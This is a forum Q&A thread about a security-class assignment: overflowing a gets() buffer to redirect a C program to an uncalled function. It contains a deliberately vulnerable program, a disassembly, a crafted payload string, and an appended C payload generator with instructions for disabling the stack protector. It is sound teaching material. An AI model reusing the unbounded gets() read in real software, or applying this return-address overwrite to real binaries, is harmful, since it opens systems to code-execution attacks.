1
votes

So I'm working on an assignment for a security class, and the assignment is to use a stack overflow to call the function oopsDidISmashTheStack, which is never used in the program.

    #include <stdio.h>
    #include <stdlib.h>

    /* Never called by the program; the goal is to land here by overwriting
     * getUserInput's saved return address. */
    int oopsDidISmashTheStack(void)
    {
        printf("Yup, smashing the stack is fun!\n");
        exit(0);
    }

    int getUserInput (void)
    {
        char buf[12];
        gets(buf);      /* deliberately unbounded read: overflows buf, the saved ebp, then the return address */
        return(1);
    }

    int main(void)
    {
        getUserInput ();
        printf("Overflow failed, normal return\n");
        return(1);
    }

I understand the concept that after the buf variable comes the sfp and then the return address; what I can't figure out is the input that would change the return value to the address 0x080484fc, which is where the function is located. I thought that it would require 12 characters to fill the buffer, and I was under the impression that the sfp and return address were 4 bytes each, so I was trying to fill the sfp with another 4 random characters and then use \xfc\x84\x04\x08 to make the return address point to the function.

If anyone is familiar with how the stack memory works and could explain where I'm going wrong, that would be great.

Can you add the disassembly that you get for getUserInput? – us2012

    Dump of assembler code for function _Z12getUserInputv:
    0x080484b4 <_Z12getUserInputv+0>:   push   %ebp
    0x080484b5 <_Z12getUserInputv+1>:   mov    %esp,%ebp
    0x080484b7 <_Z12getUserInputv+3>:   sub    $0x18,%esp
    0x080484ba <_Z12getUserInputv+6>:   lea    0xfffffff4(%ebp),%eax
    0x080484bd <_Z12getUserInputv+9>:   mov    %eax,(%esp)
    0x080484c0 <_Z12getUserInputv+12>:  call   0x8048390 <gets@plt>
    0x080484c5 <_Z12getUserInputv+17>:  mov    $0x1,%eax
    0x080484ca <_Z12getUserInputv+22>:  leave
    0x080484cb <_Z12getUserInputv+23>:  ret
    End of assembler dump.

– Jesse Taylor

Hmmm, that looks okay. Have you stepped through it with gdb or a similar debugger to see whether what is happening agrees with what you expect? – us2012

I've tried that and looked at the info frame, and I think it is, but I'm also not very familiar with the output from it, so I could be totally wrong. – Jesse Taylor

1 Answer

0
votes

You're pretty much on the right track. I suggest you look at the stack and see if the return address is where you think it is. There might be something else in there. Also double-check the endianness.

I assume this is your input string?

"012345678901xxxx\xfc\x84\x04\x08"

What is the output of your program? Generally, if you're close but don't get it quite right, the program crashes :)
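As an added example (not code from the question or the answer), here is a small payload generator for the layout the question and the disassembly describe: `lea 0xfffffff4(%ebp)` puts buf at ebp-12, the saved ebp occupies the next 4 bytes, so the return address slot starts 16 bytes into the input, and the 0x080484fc target must be written little-endian, which is exactly the `"012345678901xxxx\xfc\x84\x04\x08"` string the answer suggests. The offset of 16 and the address 0x080484fc are assumptions taken from this thread; your own binary's values must come from `objdump -d` or gdb. It also checks the one thing `gets()` is sensitive to, a newline inside the payload, and writes the bytes raw so they can be piped in rather than typed (0x08 is backspace and 0x04 is end-of-file to a terminal, so typing this string at a prompt does not deliver the bytes you think it does).

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed from the thread's disassembly: buf at ebp-0xc (12 bytes) followed by
 * the 4-byte saved ebp, so the return address slot begins at offset 16. */
#define RET_OFFSET  16
/* Assumed from the question: address of oopsDidISmashTheStack in the poster's
 * non-PIE 32-bit binary. Replace with the address from your own build. */
#define TARGET_ADDR 0x080484fcu

/* Encode a 32-bit value as little-endian bytes, the order an x86 ret reads it. */
static void put_le32(uint32_t v, unsigned char out[4])
{
    out[0] = (unsigned char)(v & 0xff);
    out[1] = (unsigned char)((v >> 8) & 0xff);
    out[2] = (unsigned char)((v >> 16) & 0xff);
    out[3] = (unsigned char)((v >> 24) & 0xff);
}

/* Fill every byte up to the return address slot, then write the target address.
 * Returns the payload length, or 0 if it does not fit in out[]. */
size_t build_payload(uint32_t target, size_t ret_offset, unsigned char *out, size_t cap)
{
    size_t len = ret_offset + 4;
    if (cap < len)
        return 0;
    memset(out, 'A', ret_offset);       /* filler covers buf and the saved ebp */
    put_le32(target, out + ret_offset); /* lands in the return address slot */
    return len;
}

/* gets() stops reading at '\n', so a newline anywhere in the payload truncates it.
 * A NUL would be stored by gets(), but would end any C-string handling of the bytes. */
int payload_is_gets_safe(const unsigned char *p, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (p[i] == '\n' || p[i] == '\0')
            return 0;
    return 1;
}

int main(void)
{
    unsigned char buf[64];
    size_t n = build_payload(TARGET_ADDR, RET_OFFSET, buf, sizeof buf);
    if (n == 0 || !payload_is_gets_safe(buf, n)) {
        fprintf(stderr, "payload not usable with gets()\n");
        return 1;
    }
    /* Emit raw bytes, then one newline so gets() returns; pipe this into the target. */
    fwrite(buf, 1, n, stdout);
    putchar('\n');
    return 0;
}
```

Build and feed it to the vulnerable binary with something like `./payload | ./target`; if the address and offset match your binary, the "Yup, smashing the stack is fun!" line prints, and because the target calls `exit(0)` nothing has to survive the corrupted saved ebp. A 0x0804xxxx address only holds for a non-PIE 32-bit build; on a PIE or 64-bit build the address, the register width, and the offset all change, and a stack protector will abort before `ret` unless the binary was built with `-fno-stack-protector`.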